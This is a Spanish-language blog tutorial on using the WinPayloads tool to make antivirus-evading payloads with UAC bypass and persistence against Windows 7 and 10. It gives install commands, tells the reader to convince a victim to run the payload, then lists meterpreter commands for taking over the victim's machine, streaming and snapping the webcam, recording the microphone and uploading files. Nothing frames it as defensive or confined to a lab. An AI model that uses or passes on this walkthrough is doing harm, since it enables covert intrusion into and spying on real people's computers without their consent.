WinPayloads - Atacando windows 7 & 10-


    En esta ocasión les traigo una herramienta la cual estuve probando y decidí compartirla con ustedes. Hablo de WinPayloads como bien su nombre lo dice esta tool nos da varias opciones para generar payloads indetectables contra los antivirus y de esta forma poder hacerle bypass a los sistema windows 7 y 10. Algo que me gusto mucho de esta herramienta es que en sus opciones esta nos genera un payload el cual automáticamente se hará persistente y tratara de conseguir permisos de administrador.

Bueno empecemos con su instalación. Lo primero la clonamos desde su repositorio.

> git clone https://github.com/nccgroup/Winpayloads.git

> cd Winpayloads

>  ./setup.sh



La instalación de dependencias tomara unos minutos, una vez termine la ejecutamos.

> ./WinPayloads.py


Listo esta seria su interfaz de usuario. Lo siguiente seria elegir nuestro payload a generar yo en mi caso eligiere la opción 2 luego pondremos el puerto de escucha y nuestra ip.


Nos pregunta si deseamos ejecutar el UAC bypass le indicamos que si, luego nos pregunta la versión de Windows que atacaremos en mi caso seria la 10. Por ultimo nos pregunta si deseamos subirla a un servidor local de indicamos que no. Ahora empezara a cargar el listener de metaploit y nuestro payload se nos guardara en una nueva carpeta llamada Winpayloads que estará en el directorio raíz.


Lo siguiente seria pasar el payloads a nuestra victima y convencerlo de que lo ejecute.



Una vez lo ejecute en nuestro kali linux nos avisara que se a creado una nueva sección meterpreter, para ver la informacion de las secciones usamos el siguiente comando:

> sessions -i

Aqui podemos ver el sistema de nuestra victima y tambien su ip. Ahora para tomar control de ese equipo basta con elegir dicha seccion con el siguiente comando:

> sessions -i 1


Listo ya tenemos nuestra meterpreter ahora ponemos el comando "help" para ver las opciones que tenemos y nos saldrá un listado como el de la imagen anterior.

Algunos comandos que podemos usar son los siguientes

tener acceso a la camara:

meterpreter > webcam_stream

tomar una foto con la camara:

meterpreter >  webcam_snap

grabar un audio con el microfono de la victima:

meterpreter > record_mic

subir un archivo de nuestro kali al equipo victima:

meterpreter > upload /root/Desktop/texto.txt (ruta del archivo)


Bueno eso son algunas de las muchas opciones que nos de la meterpreter y con esto podemos hacer un sin numero de cosas con el equipo victima todo dependerá de su imaginación.

Espero que les haya gustado y sido de ayuda no olviden compartir y suscribirse para mas tutoriales.


0 Comments